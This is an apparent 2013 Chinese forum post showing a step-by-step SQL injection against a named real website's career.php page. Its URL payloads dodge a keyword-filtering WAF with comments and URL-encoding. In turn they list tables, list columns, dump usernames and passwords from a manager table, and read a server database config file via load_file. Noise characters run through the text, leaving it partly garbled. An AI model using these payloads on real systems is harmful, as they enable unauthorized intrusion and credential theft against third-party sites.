waf过滤了 union select from 等关键词
% i' i" z( N0 i0 v6 {9 X( i" V( [& L! w2 c9 W3 J `: ^& a; B
, D1 n' d2 Z O, C- r4 E1.列当前库所有表
- L, V) w4 k$ w( l2 F6 hhttp://jyht.co.uk/career.php
# x8 d/ I1 W/ \7 j# H; t?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,%28%53%45%4C%45%43%54%20%47%52%4F%55%50%5F%43%4F%4E%43%41%54%28%69%2E%54%41%42%4C%45%5F%4E%41%4D%45%2C%30%78%33%43%36%32%37%32%32%46%33%45%29%20%46%52%4F%4D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%54%41%42%4C%45%53%20%41%53%20%69%20%57%48%45%52%45%20%69%2E%54%41%42%4C%45%5F%53%43%48%45%4D%41%20%3D%20%64%61%74%61%62%61%73%65%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,182 T. R/ M5 v) u) x! E9 j% S
% p: Y4 t. [- F& T {2.获取字段" ^7 @+ A' i& r
http://jyht.co.uk/career.php
& B: p; g& Z E$ v% L?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,group_concat(COLUMN_NAME,0x3C2F62723E),6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%43%4F%4C%55%4D%4E%53%20%77%68%65%72%65%20%54%41%42%4C%45%5F%4E%41%4D%45%3D%30%78%36%44%36%31%36%45%36%31%36%37%36%35%37%32
2 I$ y; ^% |' D+ z
5 G: @" I, m$ K/ g: d. t3.直接获取数据
" n' H; j! Y2 O( C- B, k3 Lhttp://jyht.co.uk/career.php
4 ^0 i4 Y/ R2 F9 Z/ Q% [1 ~' e?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,group_concat(id,0x3d,username,0x3d,password,0x3C62722F3E),5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D/**/%6D%61%6E%61%67%65%72: P$ S! k# U5 V k7 W! C6 ?5 b
& q0 Q7 H, [" j1 E! |) I9 `
- E4 @5 g; L: E) u+ w/ {4 @4.读文件 可以不用hex 直接在页面显示(必须是root)
* G/ t6 ]4 q* A/ u* o# W+ ahttp://jyht.co.uk/career.php
# U; v5 c( e$ {% G3 {?id=-11/**//**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,hex(load_file(0x443A5C776562736974655C6A696E797568656E67746F6E675C6A7968742E636F2E756B5C636C6173735C64625F6D7973716C2E636C6173732E70687 |
发表于 2013-3-8 21:51:05
收藏
支持
反对